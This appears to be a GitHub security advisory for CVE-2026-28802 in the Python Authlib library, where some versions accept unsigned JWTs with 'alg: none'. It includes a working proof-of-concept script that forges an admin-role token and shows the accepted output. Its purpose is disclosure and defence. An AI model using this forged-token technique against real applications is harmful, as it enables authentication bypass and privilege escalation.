GHSA-7WC2-QXGW-G8GG
Vulnerability from github – Published: 2026-03-04 20:55 – Updated: 2026-03-06 21:56
VLAI?
Summary
Authlib: Setting `alg: none` and a blank signature appears to bypass signature verification
Details
Summary
After upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.
Details
It was likely introduced in this commit: https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75
PoC
from authlib.jose import jwt, JsonWebKey
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import json
import base64
def create_jwks():
private_key = rsa.generate_private_key(
public_exponent=65537, key_size=2048, backend=default_backend()
)
public_pem = private_key.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo,
)
jwk = JsonWebKey.import_key(public_pem).as_dict()
jwk["kid"] = "test-key-001"
jwk["use"] = "sig"
jwk["alg"] = "RS256"
jwks = {"keys": [jwk]}
return jwks
def create_forged_token_with_alg_none():
forged_header = {"alg": "none"}
forged_payload = {
"sub": "user123",
"role": "admin",
"iat": 1735603200,
}
header_b64 = base64.urlsafe_b64encode(
json.dumps(forged_header).encode("utf-8")
).rstrip(b"=")
payload_b64 = base64.urlsafe_b64encode(
json.dumps(forged_payload).encode("utf-8")
).rstrip(b"=")
forged_token = header_b64 + b"." + payload_b64 + b"."
return forged_token
jwks = create_jwks()
forged_token = create_forged_token_with_alg_none()
try:
claims = jwt.decode(forged_token, jwks)
print(f"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}")
except Exception as e:
print(f"SECURE: Token rejected - {type(e).__name__}")
Output:
pip install -q authlib==1.5.2
python3 authlib_alg_none_vulnerability.py
SECURE: Token rejected - BadSignatureError
pip install -q authlib==1.6.5
python3 authlib_alg_none_vulnerability.py
VULNERABLE: Forged token (alg:none) accepted: role=admin
Impact
Users of the library are likely not aware that they now need to check the provided headers and disallow alg: none usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a 'secure by default' stance and default to rejecting it and allow the application to provide an algorithm whitelist.
Applications using this library for authentication or authorization may accept malicious, forged JWTs, leading to: - Authentication bypass - Privilege escalation - Unauthorized access - Modification of application data
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.6.6"
},
"package": {
"ecosystem": "PyPI",
"name": "authlib"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.5"
},
{
"fixed": "1.6.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28802"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-04T20:55:47Z",
"nvd_published_at": "2026-03-06T07:16:01Z",
"severity": "HIGH"
},
"details": "### Summary\nAfter upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected. \n\n### Details\nIt was likely introduced in this commit:\nhttps://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75\n\n### PoC\n```\nfrom authlib.jose import jwt, JsonWebKey\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nimport json\nimport base64\n\n\ndef create_jwks():\n private_key = rsa.generate_private_key(\n public_exponent=65537, key_size=2048, backend=default_backend()\n )\n public_pem = private_key.public_key().public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n jwk = JsonWebKey.import_key(public_pem).as_dict()\n jwk[\"kid\"] = \"test-key-001\"\n jwk[\"use\"] = \"sig\"\n jwk[\"alg\"] = \"RS256\"\n jwks = {\"keys\": [jwk]}\n return jwks\n\n\ndef create_forged_token_with_alg_none():\n forged_header = {\"alg\": \"none\"}\n forged_payload = {\n \"sub\": \"user123\",\n \"role\": \"admin\",\n \"iat\": 1735603200,\n }\n\n header_b64 = base64.urlsafe_b64encode(\n json.dumps(forged_header).encode(\"utf-8\")\n ).rstrip(b\"=\")\n\n payload_b64 = base64.urlsafe_b64encode(\n json.dumps(forged_payload).encode(\"utf-8\")\n ).rstrip(b\"=\")\n\n forged_token = header_b64 + b\".\" + payload_b64 + b\".\"\n return forged_token\n\n\njwks = create_jwks()\nforged_token = create_forged_token_with_alg_none()\ntry:\n claims = jwt.decode(forged_token, jwks)\n print(f\"VULNERABLE: Forged token (alg:none) accepted: role={claims[\u0027role\u0027]}\")\nexcept Exception as e:\n print(f\"SECURE: Token rejected - {type(e).__name__}\")\n```\n\nOutput:\n```\npip install -q authlib==1.5.2\npython3 authlib_alg_none_vulnerability.py \nSECURE: Token rejected - BadSignatureError\npip install -q authlib==1.6.5\npython3 authlib_alg_none_vulnerability.py \nVULNERABLE: Forged token (alg:none) accepted: role=admin\n```\n\n### Impact\nUsers of the library are likely not aware that they now need to check the provided headers and disallow `alg: none` usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a \u0027secure by default\u0027 stance and default to rejecting it and allow the application to provide an algorithm whitelist.\n\nApplications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:\n- Authentication bypass\n- Privilege escalation\n- Unauthorized access\n- Modification of application data",
"id": "GHSA-7wc2-qxgw-g8gg",
"modified": "2026-03-06T21:56:55Z",
"published": "2026-03-04T20:55:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"type": "WEB",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"type": "WEB",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"type": "PACKAGE",
"url": "https://github.com/authlib/authlib"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Authlib: Setting `alg: none` and a blank signature appears to bypass signature verification"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…